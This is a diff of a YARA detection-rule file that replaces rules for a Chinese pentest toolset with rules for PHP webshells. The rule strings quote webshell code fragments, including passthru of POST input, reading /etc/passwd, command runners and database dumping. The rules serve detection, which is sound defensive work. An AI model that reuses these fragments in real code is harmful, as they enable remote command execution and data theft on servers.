+		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+		$s11 = " *   Coded by Pixcher" fullword
+		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_DLL_Passive_Privilege_Escalation_Ws2Help : FILE
+rule SIGNATURE_BASE_Webshell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_Soldierofallah
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
+		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L470-L485"
+		id = "a158d158-d48d-514c-8b7b-4b6a4a10d021"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6773-L6793"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
-		logic_hash = "e13f33e48d5c1aeaef6c50287f74e03fb7b65667d597768d448e76f5a375b34f"
-		score = 70
+		logic_hash = "0b9e0d96c8a618a4883235e8c5c9a03a1e0b586cb4b30e0273e24c35ee5ee502"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
 
 	strings:
-		$s0 = "PassMinDll.dll" fullword ascii
-		$s1 = "\\ws2help.dll" ascii
+		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+		$s3 = "$dt = $_POST['filecontent'];" fullword
+		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
+		$s11 = "document.cmdform.command.value='';" fullword
+		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_7
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "12870766-2b85-522d-9ad8-abba2786caaf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L487-L503"
+		id = "506373d6-31b4-5a14-b009-f2b43028a98b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6794-L6812"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
-		logic_hash = "d48a10313afcb5a2084229937703bbc11958a5cd11f8f27fbc8dae15ddfd5ed1"
-		score = 70
+		logic_hash = "9d9b6b1333f2061c357fad110b5cc508288c70aea1212aa2fcbf283a2ce4fb2c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+		hash3 = "715f17e286416724e90113feab914c707a26d456"
 
 	strings:
-		$s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii
-		$s2 = "Do you want to cancel the file download?" fullword ascii
-		$s3 = "Downloading: %s" fullword ascii
+		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+		$s4 = "if( $action == \"dumpTable\" )" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 381KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Aspxclient : FILE
+rule SIGNATURE_BASE_Webshell__Small_Web_Shell_By_Zaco_Small_Zaco_Zacosmall
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
+		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L505-L523"
+		id = "99dbcea6-7208-5bbe-b200-9ea3074d7855"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6813-L6831"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "67569a89128f503a459eab3daa2032261507f2d2"
-		logic_hash = "4d0a93434673952fed38e384db526275b9eb32bac9a207c91f792d4d113c40f1"
-		score = 70
+		logic_hash = "840c58043e39014e90e7621c1d2417d5a970c744560738abc4fea3db3cbb8d5a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
 
 	strings:
-		$s1 = "\\tools\\hashq\\hashq.exe" wide
-		$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
-		$s3 = "\\myshell.mdb" wide
-		$s4 = "injectfile" fullword wide
+		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Fckeditor : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_8
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L525-L540"
+		id = "40c6f69f-9963-5e4f-af44-041d47738519"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6832-L6851"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4b16ae12c204f64265acef872526b27111b68820"
-		logic_hash = "0fd231fc81b2b7b5647a8016774f35751ac68646856a15c17ce4d2c07eaf1761"
-		score = 70
+		logic_hash = "346df2686c4d43b3210b07a30845477e057602500e67baba69b50c41e8d501fa"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
 
 	strings:
-		$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide
-		$s7 = "Fckeditor.exe" fullword wide
+		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s3 = "/* I added this to ensure the script will run correctly..." fullword
+		$s14 = "<!--    </form>   -->" fullword
+		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1340KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Codeeer_Explorer : FILE
+rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv_Klasvayv_Asp_Php
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L542-L557"
+		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6852-L6870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
-		logic_hash = "299d0181beb5032dcb327516a7526d6131e2212623ffa9e592f54f80473b098d"
-		score = 70
+		logic_hash = "42959ba1e3c0f7f198f953e98b9df87059999f5526df4338c109828d0a5a518a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
 
 	strings:
-		$s2 = "Codeeer Explorer.exe" fullword wide
-		$s12 = "webBrowser1_ProgressChanged" fullword ascii
+		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 470KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Swordhonkeredition : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_9
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
+		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L559-L575"
+		id = "98927127-08be-57ac-a090-38c7e614dae7"
+		date = "2014-04-06"
+		modified = "2022-12-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6872-L6892"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
-		logic_hash = "cc18e68f7c3eff69a75333f3b605c89b024c6763f7b97e0ce20ce14bfe28df0d"
+		logic_hash = "9f8768f609ccd464f7c2b9d10ce8ea423355e11b05b39e629e5e3de0787e212b"
 		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 77
+		tags = ""
+		super_rule = 1
+		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
 
 	strings:
-		$s0 = "\\bin\\systemini\\MyPort.ini" wide
-		$s1 = "PortThread=200 //" fullword wide
-		$s2 = " Port Open -> " fullword wide
+		$ = { 3a 3c 62 3e 22 20 2e 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 27 74 6f 74 27 5d 29 2e 20 22 3c 2f 62 3e 22 3b }
+		$ = { 69 66 20 28 69 73 73 65 74 28 24 5f 50 4f 53 54 5b 27 77 71 27 5d 29 20 26 26 20 24 5f 50 4f 53 54 5b 27 77 71 27 5d 3c 3e 22 22 29 20 7b }
+		$ = { 70 61 73 73 74 68 72 75 28 24 5f 50 4f 53 54 5b 27 63 27 5d 29 3b }
+		$ = { 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 74 61 63 22 20 76 61 6c 75 65 3d 22 31 22 3e 42 36 34 20 44 65 63 6f 64 65 3c 62 72 3e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 375KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_Pwdump7 : FILE
+rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L577-L594"
+		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6894-L6910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
-		logic_hash = "05f735ba3f377f71ccf3a97b3597cee7b9f36213ee2ebba19db69667529d9fac"
-		score = 70
+		logic_hash = "b2f2b95415bc990adac38eada20cbc793f286d51f2054bc969e9c667f16717f9"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
 
 	strings:
-		$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii
-		$s2 = "No Users key!" fullword ascii
-		$s3 = "NO PASSWORD*********************:" fullword ascii
-		$s4 = "Unable to dump file %S" fullword ascii
+		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
+		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Chinachopper : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
+		description = "PHP Webshells Github Archive - from files Dive Shell 1.0"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L596-L612"
+		id = "9a87038b-3f78-5b9a-a209-c9026d83363f"
+		date = "2014-04-06"
+		modified = "2022-12-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6912-L6931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
-		logic_hash = "e5e6a8a17592e7c82af830153905a52f8202a65c8e2f4b09dbebb19d04e2f8d7"
+		logic_hash = "9e3759d45d13e33481b962c4b59a019647a3e80bdd3885c4404169af74288b89"
 		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 79
+		tags = ""
+		super_rule = 1
+		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
 
 	strings:
-		$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide
-		$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide
-		$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide
+		$ = { 76 61 72 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3d 20 6e 65 77 20 41 72 72 61 79 28 3c 3f 70 68 70 20 65 63 68 6f 20 24 6a 73 5f 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3f 3e 29 3b }
+		$ = { 69 66 20 28 65 6d 70 74 79 28 24 5f 53 45 53 53 49 4f 4e 5b 27 63 77 64 27 5d 29 20 7c 7c 20 21 65 6d 70 74 79 28 24 5f 52 45 51 55 45 53 54 5b 27 72 65 73 65 74 27 5d 29 29 20 7b }
+		$ = { 69 66 20 28 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 33 38 20 26 26 20 63 75 72 72 65 6e 74 5f 6c 69 6e 65 20 3c 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 20 7b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Dedecms5_7 : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b037862d-2821-5e96-996b-13ab241575ba"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L614-L629"
+		id = "be335331-34d7-5abc-b29b-eac7a5ec3915"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6933-L6952"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
-		logic_hash = "57ff887906d3c5e7eafc900581eea7432c7a18364b0061d0e4deba0229663c65"
-		score = 70
+		logic_hash = "0a63d3b00ad9719140da9bb5dcb49981c4d3758fac13c392d016b47e54f356c8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "/data/admin/ver.txt" fullword ascii
-		$s2 = "SkinH_EL.dll" fullword ascii
+		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+		$s4 = "\\$port = {$_POST['port']};"
+		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 830KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Ee : FILE
+rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Erne_Stres
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ee.exe"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03540f82-6662-55e3-97f8-38776271f08b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L631-L646"
+		id = "4e73e42e-b968-5b68-a00d-d2a8a1f3541c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6953-L6974"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
-		logic_hash = "1f40f6c53e13aeb6b44c58f6e048a35cf3fd9fb956f26d70b3fe91bcac340ab5"
-		score = 70
+		logic_hash = "a0484a5a71715d6a79c89e20919ab89aaa7e85a18ee502651f1f6b29153847a3"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "GetIIS UserName and PassWord." fullword wide
-		$s2 = "Read IIS ID For FreeHost." fullword wide
+		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
+		$s4 = "var_dump(curl_exec($ch));" fullword
+		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
+		$s10 = "$m=$_POST['curl'];" fullword
+		$s13 = "$u1p=$_POST['copy'];" fullword
+		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
+		$s15 = "$string = explode(\"|\",$string);" fullword
+		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Smsniff_Smsniff : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_3
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L648-L663"
+		id = "ff7c6534-efcf-565e-bfc0-1eaa2e9d7b7d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6975-L6994"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8667a785a8ced76d0284d225be230b5f1546f140"
-		logic_hash = "6949f992d4734f18d9caffe83f2abccca0e0decef4169954518eed078d39e561"
-		score = 70
+		logic_hash = "5c264a294fc75cf2cadd3dba61bc64658989ffe5ddecfa18ba18e66492ad3c71"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
 
 	strings:
-		$s1 = "smsniff.exe" fullword wide
-		$s5 = "SmartSniff" fullword wide
+		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
+		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Happy_Happy : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_4
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6e6c806d-e784-507f-b327-3b9f2510422b"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L665-L683"
+		id = "2932cb85-927e-536b-b8d8-a0ac0d1ef8ec"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
